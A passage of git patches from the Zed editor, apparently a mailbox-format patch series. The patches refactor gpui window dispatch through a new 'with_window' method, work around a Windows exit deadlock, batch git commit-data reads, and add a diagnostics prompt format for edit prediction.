R, + ) -> Option { + let app = self.app.upgrade()?; + let mut lock = app.try_borrow_mut().ok()?; + if lock.quitting { + return None; + } + lock.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, @@ -365,7 +378,12 @@ impl AppContext for AsyncWindowContext { where T: 'static, { - self.app.new(build_entity) + // Associate the new entity with our captured window so that + // `with_window` can resolve a dispatch target before the entity has + // been rendered. + self.app + .update_window(self.window, |_, _, cx| cx.new(build_entity)) + .expect("window was unexpectedly closed") } fn reserve_entity(&mut self) -> Reservation { @@ -377,7 +395,11 @@ impl AppContext for AsyncWindowContext { reservation: Reservation, build_entity: impl FnOnce(&mut Context) -> T, ) -> Entity { - self.app.insert_entity(reservation, build_entity) + self.app + .update_window(self.window, |_, _, cx| { + cx.insert_entity(reservation, build_entity) + }) + .expect("window was unexpectedly closed") } fn update_entity( @@ -409,6 +431,14 @@ impl AppContext for AsyncWindowContext { self.app.update_window(window, update) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + self.app.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, @@ -457,9 +487,12 @@ impl VisualContext for AsyncWindowContext { view: &Entity, update: impl FnOnce(&mut T, &mut Window, &mut Context) -> R, ) -> Result { - self.app.update_window(self.window, |_, window, cx| { - view.update(cx, |entity, cx| update(entity, window, cx)) - }) + let view = view.clone(); + self.app + .with_window(view.entity_id(), |window, app| { + view.update(app, |entity, cx| update(entity, window, cx)) + }) + .context("entity has no current window") } fn replace_root_view( diff --git a/crates/gpui/src/app/context.rs b/crates/gpui/src/app/context.rs index c2c74a0d57c8f0..0d1ee47ce436e8 100644 --- a/crates/gpui/src/app/context.rs +++ 
b/crates/gpui/src/app/context.rs @@ -307,9 +307,13 @@ impl<'a, T: 'static> Context<'a, T> { window: &Window, f: impl FnOnce(&mut T, &mut Window, &mut Context) + 'static, ) { - let view = self.entity(); - window.defer(self, move |window, cx| { - view.update(cx, |view, cx| f(view, window, cx)) + let view = self.weak_entity(); + let entity_id = self.entity_id(); + self.ensure_window(entity_id, window.handle.id); + self.app.defer(move |cx| { + cx.with_window(entity_id, |window, cx| { + view.update(cx, |view, cx| f(view, window, cx)).ok(); + }); }); } @@ -326,25 +330,21 @@ impl<'a, T: 'static> Context<'a, T> { { let observed_id = observed.entity_id(); let observed = observed.downgrade(); - let window_handle = window.handle; let observer = self.weak_entity(); + let observer_id = self.entity_id(); + self.ensure_window(observer_id, window.handle.id); self.new_observer( observed_id, Box::new(move |cx| { - window_handle - .update(cx, |_, window, cx| { - if let Some((observer, observed)) = - observer.upgrade().zip(observed.upgrade()) - { - observer.update(cx, |observer, cx| { - on_notify(observer, observed, window, cx); - }); - true - } else { - false - } - }) - .unwrap_or(false) + let Some((observer, observed)) = observer.upgrade().zip(observed.upgrade()) else { + return false; + }; + cx.with_window(observer_id, |window, cx| { + observer.update(cx, |observer, cx| { + on_notify(observer, observed, window, cx); + }); + }); + true }), ) } @@ -363,28 +363,25 @@ impl<'a, T: 'static> Context<'a, T> { Evt: 'static, { let emitter = emitter.downgrade(); - let window_handle = window.handle; let subscriber = self.weak_entity(); + let subscriber_id = self.entity_id(); + self.ensure_window(subscriber_id, window.handle.id); self.new_subscription( emitter.entity_id(), ( TypeId::of::(), Box::new(move |event, cx| { - window_handle - .update(cx, |_, window, cx| { - if let Some((subscriber, emitter)) = - subscriber.upgrade().zip(emitter.upgrade()) - { - let event = 
event.downcast_ref().expect("invalid event type"); - subscriber.update(cx, |subscriber, cx| { - on_event(subscriber, &emitter, event, window, cx); - }); - true - } else { - false - } - }) - .unwrap_or(false) + let Some((subscriber, emitter)) = subscriber.upgrade().zip(emitter.upgrade()) + else { + return false; + }; + let event = event.downcast_ref().expect("invalid event type"); + cx.with_window(subscriber_id, |window, cx| { + subscriber.update(cx, |subscriber, cx| { + on_event(subscriber, &emitter, event, window, cx); + }); + }); + true }), ), ) @@ -835,6 +832,15 @@ impl AppContext for Context<'_, T> { self.app.update_window(window, update) } + #[inline] + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + self.app.with_window(entity_id, f) + } + #[inline] fn read_window( &self, diff --git a/crates/gpui/src/app/entity_map.rs b/crates/gpui/src/app/entity_map.rs index cc4eaee4926188..e4e9f3b58a5f73 100644 --- a/crates/gpui/src/app/entity_map.rs +++ b/crates/gpui/src/app/entity_map.rs @@ -795,14 +795,13 @@ impl WeakEntity { update: impl FnOnce(&mut T, &mut Window, &mut Context) -> R, ) -> Result where - C: VisualContext, + C: AppContext, { - let window = cx.window_handle(); let entity = self.upgrade().context("entity released")?; - - window.update(cx, |_, window, cx| { - entity.update(cx, |entity, cx| update(entity, window, cx)) + cx.with_window(entity.entity_id(), |window, app| { + entity.update(app, |entity, cx| update(entity, window, cx)) }) + .context("entity has no current window") } /// Reads the entity referenced by this handle with the given function if diff --git a/crates/gpui/src/app/headless_app_context.rs b/crates/gpui/src/app/headless_app_context.rs index 90dc8c8f0c0994..b21e64fa369b5c 100644 --- a/crates/gpui/src/app/headless_app_context.rs +++ b/crates/gpui/src/app/headless_app_context.rs @@ -10,7 +10,7 @@ use crate::{ AnyView, AnyWindowHandle, App, AppCell, AppContext, AssetSource, 
BackgroundExecutor, Bounds, - Context, Entity, ForegroundExecutor, Global, Pixels, PlatformHeadlessRenderer, + Context, Entity, EntityId, ForegroundExecutor, Global, Pixels, PlatformHeadlessRenderer, PlatformTextSystem, Render, Reservation, Size, Task, TestDispatcher, TestPlatform, TextSystem, Window, WindowBounds, WindowHandle, WindowOptions, app::{GpuiBorrow, GpuiMode}, @@ -246,6 +246,15 @@ impl AppContext for HeadlessAppContext { lock.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + let mut lock = self.app.borrow_mut(); + lock.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, diff --git a/crates/gpui/src/app/test_context.rs b/crates/gpui/src/app/test_context.rs index 99a64b54e2fee1..8a6d7e3f840d05 100644 --- a/crates/gpui/src/app/test_context.rs +++ b/crates/gpui/src/app/test_context.rs @@ -1,9 +1,9 @@ use crate::{ Action, AnyView, AnyWindowHandle, App, AppCell, AppContext, AsyncApp, AvailableSpace, BackgroundExecutor, BorrowAppContext, Bounds, Capslock, ClipboardItem, DrawPhase, Drawable, - Element, Empty, EventEmitter, ForegroundExecutor, Global, InputEvent, Keystroke, Modifiers, - ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, - Platform, Point, Render, Result, Size, Task, TestDispatcher, TestPlatform, + Element, Empty, EntityId, EventEmitter, ForegroundExecutor, Global, InputEvent, Keystroke, + Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, + Pixels, Platform, Point, Render, Result, Size, Task, TestDispatcher, TestPlatform, TestScreenCaptureSource, TestWindow, TextSystem, VisualContext, Window, WindowBounds, WindowHandle, WindowOptions, app::GpuiMode, window::ElementArenaScope, }; @@ -84,6 +84,15 @@ impl AppContext for TestAppContext { lock.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, 
&mut App) -> R, + ) -> Option { + let mut lock = self.app.borrow_mut(); + lock.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, @@ -193,12 +202,6 @@ impl TestAppContext { &self.foreground_executor } - #[expect(clippy::wrong_self_convention)] - fn new(&mut self, build_entity: impl FnOnce(&mut Context) -> T) -> Entity { - let mut cx = self.app.borrow_mut(); - cx.new(build_entity) - } - /// Gives you an `&mut App` for the duration of the closure pub fn update(&self, f: impl FnOnce(&mut App) -> R) -> R { let mut cx = self.app.borrow_mut(); @@ -940,7 +943,9 @@ impl VisualTestContext { impl AppContext for VisualTestContext { fn new(&mut self, build_entity: impl FnOnce(&mut Context) -> T) -> Entity { - self.cx.new(build_entity) + self.window + .update(&mut self.cx, |_, _, cx| cx.new(build_entity)) + .expect("window was unexpectedly closed") } fn reserve_entity(&mut self) -> crate::Reservation { @@ -952,7 +957,11 @@ impl AppContext for VisualTestContext { reservation: crate::Reservation, build_entity: impl FnOnce(&mut Context) -> T, ) -> Entity { - self.cx.insert_entity(reservation, build_entity) + self.window + .update(&mut self.cx, |_, _, cx| { + cx.insert_entity(reservation, build_entity) + }) + .expect("window was unexpectedly closed") } fn update_entity( @@ -987,6 +996,14 @@ impl AppContext for VisualTestContext { self.cx.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + self.cx.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, @@ -1037,11 +1054,14 @@ impl VisualContext for VisualTestContext { view: &Entity, update: impl FnOnce(&mut V, &mut Window, &mut Context) -> R, ) -> R { - self.window - .update(&mut self.cx, |_, window, cx| { - view.update(cx, |v, cx| update(v, window, cx)) + let view = view.clone(); + self.cx + .app + .borrow_mut() + .with_window(view.entity_id(), |window, app| { + view.update(app, |v, cx| 
update(v, window, cx)) }) - .expect("window was unexpectedly closed") + .expect("entity has no current window; use `update` instead of `update_in`") } fn replace_root_view( diff --git a/crates/gpui/src/app/visual_test_context.rs b/crates/gpui/src/app/visual_test_context.rs index f0fbf47f1f8200..b54802a299b83b 100644 --- a/crates/gpui/src/app/visual_test_context.rs +++ b/crates/gpui/src/app/visual_test_context.rs @@ -1,9 +1,9 @@ use crate::{ Action, AnyView, AnyWindowHandle, App, AppCell, AppContext, AssetSource, BackgroundExecutor, - Bounds, ClipboardItem, Context, Entity, ForegroundExecutor, Global, InputEvent, Keystroke, - Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Platform, Point, - Render, Result, Size, Task, TestDispatcher, TextSystem, VisualTestPlatform, Window, - WindowBounds, WindowHandle, WindowOptions, app::GpuiMode, + Bounds, ClipboardItem, Context, Entity, EntityId, ForegroundExecutor, Global, InputEvent, + Keystroke, Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, + Platform, Point, Render, Result, Size, Task, TestDispatcher, TextSystem, VisualTestPlatform, + Window, WindowBounds, WindowHandle, WindowOptions, app::GpuiMode, }; use anyhow::anyhow; use image::RgbaImage; @@ -446,6 +446,15 @@ impl AppContext for VisualTestAppContext { lock.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + let mut lock = self.app.borrow_mut(); + lock.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, diff --git a/crates/gpui/src/gpui.rs b/crates/gpui/src/gpui.rs index 9f307f56b8fadc..5f1e9a95bcb757 100644 --- a/crates/gpui/src/gpui.rs +++ b/crates/gpui/src/gpui.rs @@ -171,6 +171,16 @@ pub trait AppContext { where F: FnOnce(AnyView, &mut Window, &mut App) -> T; + /// Run `f` against the entity's *current* window — the most recently + /// rendered window that referenced the entity. 
Returns `None` if the + /// entity has no current window or that window is unavailable. See + /// [`App::with_window`] for the underlying lookup. + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option; + /// Read a window off of the application context. fn read_window( &self, diff --git a/crates/gpui_macros/src/derive_app_context.rs b/crates/gpui_macros/src/derive_app_context.rs index 46f9e584098957..451731479c20ac 100644 --- a/crates/gpui_macros/src/derive_app_context.rs +++ b/crates/gpui_macros/src/derive_app_context.rs @@ -79,6 +79,15 @@ pub fn derive_app_context(input: TokenStream) -> TokenStream { self.#app_variable.update_window(window, f) } + fn with_window( + &mut self, + entity_id: gpui::EntityId, + f: impl FnOnce(&mut gpui::Window, &mut gpui::App) -> R, + ) -> Option + { + self.#app_variable.with_window(entity_id, f) + } + fn read_window( &self, window: &gpui::WindowHandle, diff --git a/crates/sidebar/src/sidebar_tests.rs b/crates/sidebar/src/sidebar_tests.rs index 9224edc3bed876..b2f9e6ac1ae442 100644 --- a/crates/sidebar/src/sidebar_tests.rs +++ b/crates/sidebar/src/sidebar_tests.rs @@ -10981,7 +10981,7 @@ async fn test_remote_archive_thread_with_disconnected_remote( // Disconnect the remote connection before archiving. We don't // `run_until_parked` here because the disconnect itself triggers // reconnection work that can't complete in the test environment. - remote_client.update_in(cx, |client, _window, cx| { + remote_client.update(cx, |client, cx| { client.simulate_disconnect(cx).detach(); }); From 2a4a5d6217cd5ee1587512e2d2cade4c613158ab Mon Sep 17 00:00:00 2001 From: John Tur Date: Tue, 28 Apr 2026 10:19:03 +0200 Subject: [PATCH 069/231] Fix process teardown deadlock on Windows (#55065) AWS-LC registers an `atexit` handler that intentionally acquires a lock without releasing it. AWS-LC also has `thread_local` objects which acquire this lock in their destructor. 
Destructors for `thread_local`s run under the loader lock. So, there is a race condition where, if a thread exits after `atexit` handlers have run, the TLS destructors will block indefinitely on this lock while holding the loader lock. Since `ExitProcess` also requires the loader lock, process teardown will deadlock. Closes #54856 Release Notes: - Fixed an issue where the Zed process wouldn't exit after closing all windows --- crates/gpui_windows/src/platform.rs | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/crates/gpui_windows/src/platform.rs b/crates/gpui_windows/src/platform.rs index 7e9f1e77487b41..4c2898256212a7 100644 --- a/crates/gpui_windows/src/platform.rs +++ b/crates/gpui_windows/src/platform.rs @@ -410,6 +410,17 @@ impl Platform for WindowsPlatform { self.inner .with_callback(|callbacks| &callbacks.quit, |callback| callback()); + + // Bypass the CRT exit logic, which runs atexit handlers before calling ExitProcess. + // aws-lc registers an atexit handler that intentionally acquires a lock without releasing it. + // aws-lc also has thread_local objects which acquire this lock in their destructor. + // Destructors for thread_locals run under the loader lock, so there is a race condition + // where, if a thread exits after atexit handlers have run, the TLS destructors will block + // indefinitely on this lock while holding the loader lock. Since ExitProcess also requires + // the loader lock, process teardown will deadlock. 
+ unsafe { + windows::Win32::System::Threading::ExitProcess(0); + } } fn quit(&self) { From 689f198daececd922e8ad9b75ad539d5019129cc Mon Sep 17 00:00:00 2001 From: feeiyu <158308373+feeiyu@users.noreply.github.com> Date: Tue, 28 Apr 2026 16:29:21 +0800 Subject: [PATCH 070/231] git_graph: Align CommitDataReader with batched commit processing (#54600) Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Updated `CommitDataReader::read` from single SHA to batched input/output. `run_commit_data_reader` is designed to process requests in batches, but `CommitDataReader::read` previously only sent one SHA per call. So in practice, commit data was effectively processed one-by-one from the caller path. The temporary debug logs show that batching was not performed previously. 
before: image after: image Release Notes: - N/A --------- Co-authored-by: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Co-authored-by: Anthony Eid --- crates/project/src/git_store.rs | 47 +++++++++++++++++++++++++++------ 1 file changed, 39 insertions(+), 8 deletions(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index a6d963bd111beb..31ad970d6ead84 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -5236,6 +5236,16 @@ impl Repository { result_tx: smol::channel::Sender<(Oid, CommitData)>, background_executor: BackgroundExecutor, ) { + async fn receive_commit_data_request( + request_rx: &smol::channel::Receiver, + ) -> Option { + if request_rx.is_closed() && request_rx.is_empty() { + future::pending().await + } else { + request_rx.recv().await.ok() + } + } + let reader = match backend.commit_data_reader() { Ok(reader) => reader, Err(error) => { @@ -5244,19 +5254,38 @@ impl Repository { } }; + let read_commit_data = |sha| reader.read(sha).map(move |result| (sha, result)); + let mut read_futures = FuturesUnordered::new(); + loop { - let timeout = background_executor.timer(std::time::Duration::from_secs(10)); + if read_futures.is_empty() { + let timeout = background_executor.timer(Duration::from_secs(10)); - futures::select_biased! { - sha = futures::FutureExt::fuse(request_rx.recv()) => { - let Ok(sha) = sha else { + futures::select_biased! { + sha = futures::FutureExt::fuse(receive_commit_data_request(&request_rx)) => { + if let Some(sha) = sha { + read_futures.push(read_commit_data(sha)); + } + } + _ = futures::FutureExt::fuse(timeout) => { break; + } + } + } + + let next_read = read_futures.next().fuse(); + futures::pin_mut!(next_read); + + futures::select_biased! 
{ + result = next_read => { + let Some((sha, result)) = result else { + continue; }; - match reader.read(sha).await { + match result { Ok(commit_data) => { if result_tx.send((sha, commit_data)).await.is_err() { - break; + return; } } Err(error) => { @@ -5264,8 +5293,10 @@ impl Repository { } } } - _ = futures::FutureExt::fuse(timeout) => { - break; + sha = futures::FutureExt::fuse(receive_commit_data_request(&request_rx)) => { + if let Some(sha) = sha { + read_futures.push(read_commit_data(sha)); + } } } } From 6daee16e71b61876d7c6fcd1184fd2a0ea989b0f Mon Sep 17 00:00:00 2001 From: Ben Kunkle Date: Tue, 28 Apr 2026 04:53:00 -0500 Subject: [PATCH 071/231] ep: Add diagnostics teacher format (#54999) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A or Added/Fixed/Improved ... 
--- .../edit_prediction_cli/src/format_prompt.rs | 51 ++++++++- .../src/prompts/teacher.md | 1 + crates/zeta_prompt/src/zeta_prompt.rs | 106 ++++++++++++++++-- 3 files changed, 146 insertions(+), 12 deletions(-) diff --git a/crates/edit_prediction_cli/src/format_prompt.rs b/crates/edit_prediction_cli/src/format_prompt.rs index 91f6aebe0faf5a..64ca0585fab910 100644 --- a/crates/edit_prediction_cli/src/format_prompt.rs +++ b/crates/edit_prediction_cli/src/format_prompt.rs @@ -47,7 +47,14 @@ pub async fn run_format_prompt( let (editable_range, context_range) = resolved_excerpt_ranges_for_format(prompt_inputs, zeta_format); - let prompt = TeacherPrompt::format_prompt(example, editable_range, context_range); + let include_diagnostics = matches!(zeta_format, ZetaFormat::V0420Diagnostics); + + let prompt = TeacherPrompt::format_prompt( + example, + editable_range, + context_range, + include_diagnostics, + ); example.prompt = Some(ExamplePrompt { input: prompt, expected_output: None, @@ -64,8 +71,14 @@ pub async fn run_format_prompt( let (editable_range, context_range) = resolved_excerpt_ranges_for_format(prompt_inputs, zeta_format); - let prompt = - TeacherMultiRegionPrompt::format_prompt(example, editable_range, context_range); + let include_diagnostics = matches!(zeta_format, ZetaFormat::V0420Diagnostics); + + let prompt = TeacherMultiRegionPrompt::format_prompt( + example, + editable_range, + context_range, + include_diagnostics, + ); example.prompt = Some(ExamplePrompt { input: prompt, expected_output: None, @@ -128,15 +141,20 @@ impl TeacherPrompt { example: &Example, editable_range: Range, context_range: Range, + include_diagnostics: bool, ) -> String { let edit_history = Self::format_edit_history(&example.spec.edit_history); let context = Self::format_context(example); let cursor_excerpt = Self::format_cursor_excerpt(example, editable_range, context_range); + let diagnostics = include_diagnostics + .then(|| Self::format_diagnostics(example)) + .map(|diagnostics| 
format!("# 4. Diagnostics\n\n{diagnostics}")); let prompt_template = crate::prompt_assets::get_prompt("teacher.md"); let prompt = prompt_template .replace("{{context}}", &context) .replace("{{edit_history}}", &edit_history) + .replace("{{diagnostics}}", diagnostics.as_deref().unwrap_or("")) .replace("{{cursor_excerpt}}", &cursor_excerpt); prompt @@ -294,6 +312,27 @@ impl TeacherPrompt { let region = &text[start..end]; Ok(region.strip_suffix('\n').unwrap_or(region).to_string()) } + + fn format_diagnostics(example: &Example) -> String { + example + .prompt_inputs + .as_ref() + .map(|prompt_inputs| { + prompt_inputs + .active_buffer_diagnostics + .iter() + .map(|diagnostic| { + format!( + "*{}*:\n```\n{}\n```\n", + &diagnostic.message, &diagnostic.snippet + ) + }) + .collect::>() + .join("\n") + }) + .filter(|m| !m.is_empty()) + .unwrap_or("No Diagnostics".to_string()) + } } pub struct TeacherMultiRegionPrompt; @@ -309,15 +348,20 @@ impl TeacherMultiRegionPrompt { example: &Example, editable_range: Range, context_range: Range, + include_diagnostics: bool, ) -> String { let edit_history = Self::format_edit_history(&example.spec.edit_history); let context = Self::format_context(example); let cursor_excerpt = Self::format_cursor_excerpt(example, editable_range, context_range); + let diagnostics = include_diagnostics + .then(|| TeacherPrompt::format_diagnostics(example)) + .map(|diagnostics| format!("# 4. 
Diagnostics\n\n{diagnostics}")); let prompt_template = crate::prompt_assets::get_prompt("teacher_multi_region.md"); let prompt = prompt_template .replace("{{context}}", &context) .replace("{{edit_history}}", &edit_history) + .replace("{{diagnostics}}", diagnostics.as_deref().unwrap_or("")) .replace("{{cursor_excerpt}}", &cursor_excerpt); prompt @@ -900,6 +944,7 @@ mod tests { }, editable_range, context_range, + false, ); assert!(prompt.contains(TeacherPrompt::EDITABLE_REGION_START)); diff --git a/crates/edit_prediction_cli/src/prompts/teacher.md b/crates/edit_prediction_cli/src/prompts/teacher.md index 524109c7a418fb..22a2514974d853 100644 --- a/crates/edit_prediction_cli/src/prompts/teacher.md +++ b/crates/edit_prediction_cli/src/prompts/teacher.md @@ -350,6 +350,7 @@ def calculate_square_perimeter(side): {{cursor_excerpt}} +{{diagnostics}} ----- diff --git a/crates/zeta_prompt/src/zeta_prompt.rs b/crates/zeta_prompt/src/zeta_prompt.rs index 37799d528b923b..12767122fc4059 100644 --- a/crates/zeta_prompt/src/zeta_prompt.rs +++ b/crates/zeta_prompt/src/zeta_prompt.rs @@ -95,6 +95,8 @@ pub enum ZetaFormat { V0318SeedMultiRegions, /// V0318-style markers over the full available current file excerpt with no related files. 
V0327SingleFile, + /// V0318-style prompt with buffer diagnostics + V0420Diagnostics, } impl std::fmt::Display for ZetaFormat { @@ -245,7 +247,8 @@ pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> Option | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0317SeedMultiRegions | ZetaFormat::V0331SeedCoderModelPy - | ZetaFormat::V0318SeedMultiRegions => 4096, + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0420Diagnostics => 4096, ZetaFormat::V0327SingleFile => 16384, }; @@ -278,7 +281,7 @@ pub fn special_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] ]; TOKENS } - ZetaFormat::V0318SeedMultiRegions => { + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { static TOKENS: &[&str] = &[ seed_coder::FIM_SUFFIX, seed_coder::FIM_PREFIX, @@ -345,6 +348,7 @@ pub fn token_limits_for_format(format: ZetaFormat) -> (usize, usize) { | ZetaFormat::V0306SeedMultiRegions | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0420Diagnostics | ZetaFormat::V0317SeedMultiRegions | ZetaFormat::V0327SingleFile | ZetaFormat::V0304SeedNoEdits => (350, 150), @@ -368,7 +372,9 @@ pub fn stop_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] { | ZetaFormat::V0306SeedMultiRegions | ZetaFormat::V0304SeedNoEdits => &[], ZetaFormat::V0316SeedMultiRegions => &[multi_region::V0316_END_MARKER], - ZetaFormat::V0318SeedMultiRegions => &[multi_region::V0318_END_MARKER], + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { + &[multi_region::V0318_END_MARKER] + } ZetaFormat::V0317SeedMultiRegions => &[multi_region::V0317_END_MARKER], ZetaFormat::V0327SingleFile => &[multi_region::V0327_END_MARKER], } @@ -398,7 +404,8 @@ pub fn excerpt_ranges_for_format( | ZetaFormat::V0306SeedMultiRegions | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions - | ZetaFormat::V0317SeedMultiRegions => ( + | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0420Diagnostics 
=> ( ranges.editable_350.clone(), ranges.editable_350_context_150.clone(), ), @@ -497,7 +504,7 @@ pub fn write_cursor_excerpt_section_for_format( cursor_offset, )); } - ZetaFormat::V0318SeedMultiRegions => { + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { prompt.push_str(&build_v0318_cursor_prefix( path, context, @@ -709,7 +716,8 @@ pub fn format_prompt_with_budget_for_format( | ZetaFormat::V0306SeedMultiRegions | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions - | ZetaFormat::V0317SeedMultiRegions => { + | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0420Diagnostics => { let mut cursor_section = String::new(); write_cursor_excerpt_section_for_format( format, @@ -720,6 +728,10 @@ pub fn format_prompt_with_budget_for_format( cursor_offset, ); + if format == ZetaFormat::V0420Diagnostics { + cursor_section.push_str(&format_active_buffer_diagnostics(input)); + } + let budget_with_margin = apply_prompt_budget_margin(max_tokens); seed_coder::assemble_fim_prompt( context, @@ -795,6 +807,26 @@ pub fn format_prompt_with_budget_for_format( return Some(prompt); } +fn format_active_buffer_diagnostics(input: &ZetaPromptInput) -> String { + let mut output = format!("{}diagnostics\n", seed_coder::FILE_MARKER); + + if input.active_buffer_diagnostics.is_empty() { + output.push_str("No Diagnostics\n"); + return output; + } + + for diagnostic in &input.active_buffer_diagnostics { + writeln!( + output, + "*{}*:\n```\n{}\n```", + diagnostic.message, diagnostic.snippet + ) + .ok(); + } + + output +} + pub fn filter_redundant_excerpts( mut related_files: Vec, cursor_path: &Path, @@ -829,6 +861,7 @@ pub fn max_edit_event_count_for_format(format: &ZetaFormat) -> usize { | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0420Diagnostics | ZetaFormat::V0327SingleFile => 6, } } @@ -854,6 +887,7 @@ pub fn get_prefill_for_format( | ZetaFormat::V0316SeedMultiRegions | 
ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0420Diagnostics | ZetaFormat::V0327SingleFile => String::new(), } } @@ -869,6 +903,7 @@ pub fn output_end_marker_for_format(format: ZetaFormat) -> Option<&'static str> | ZetaFormat::V0306SeedMultiRegions => Some(seed_coder::END_MARKER), ZetaFormat::V0316SeedMultiRegions => Some(multi_region::V0316_END_MARKER), ZetaFormat::V0318SeedMultiRegions => Some(multi_region::V0318_END_MARKER), + ZetaFormat::V0420Diagnostics => Some(multi_region::V0318_END_MARKER), ZetaFormat::V0317SeedMultiRegions => Some(multi_region::V0317_END_MARKER), ZetaFormat::V0327SingleFile => Some(multi_region::V0327_END_MARKER), @@ -914,7 +949,7 @@ pub fn encode_patch_as_output_for_format( Ok(None) } } - ZetaFormat::V0318SeedMultiRegions => { + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { let empty_patch = patch.lines().count() <= 3; if empty_patch { let marker_offsets = @@ -1001,7 +1036,7 @@ pub fn format_expected_output( multi_region::V0316_END_MARKER, ) } - ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0327SingleFile => { + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { let (new_editable, first_hunk_offset) = udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); @@ -1013,6 +1048,18 @@ pub fn format_expected_output( multi_region::V0318_END_MARKER, ) } + ZetaFormat::V0327SingleFile => { + let (new_editable, first_hunk_offset) = + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; + let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); + multi_region::encode_from_old_and_new_v0318( + &old_editable, + &new_editable, + cursor_in_new, + CURSOR_MARKER, + multi_region::V0327_END_MARKER, + ) + } ZetaFormat::V0317SeedMultiRegions => { let (new_editable, first_hunk_offset) = 
udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; @@ -1162,7 +1209,7 @@ pub fn parse_zeta2_model_output( editable_range_in_context, multi_region::apply_marker_span_v0316(old_editable_region, output)?, ), - ZetaFormat::V0318SeedMultiRegions => ( + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => ( editable_range_in_context, multi_region::apply_marker_span_v0318(old_editable_region, output)?, ), @@ -5158,6 +5205,47 @@ mod tests { ); } + #[test] + fn test_v0420_formats_diagnostics_after_cursor_file() { + let mut input = make_input( + "prefix\neditable\nsuffix", + 7..15, + 10, + vec![], + vec![make_related_file("related.rs", "fn helper() {}\n")], + ); + input.active_buffer_diagnostics = vec![ActiveBufferDiagnostic { + severity: Some(1), + message: "missing semicolon".to_string(), + snippet: "let value = 1".to_string(), + snippet_buffer_row_range: 1..2, + diagnostic_range_in_snippet: 12..13, + }]; + + let prompt = + format_prompt_with_budget_for_format(&input, ZetaFormat::V0420Diagnostics, 10000) + .expect("v0420 prompt formatting should succeed"); + + assert_eq!( + prompt, + indoc! 
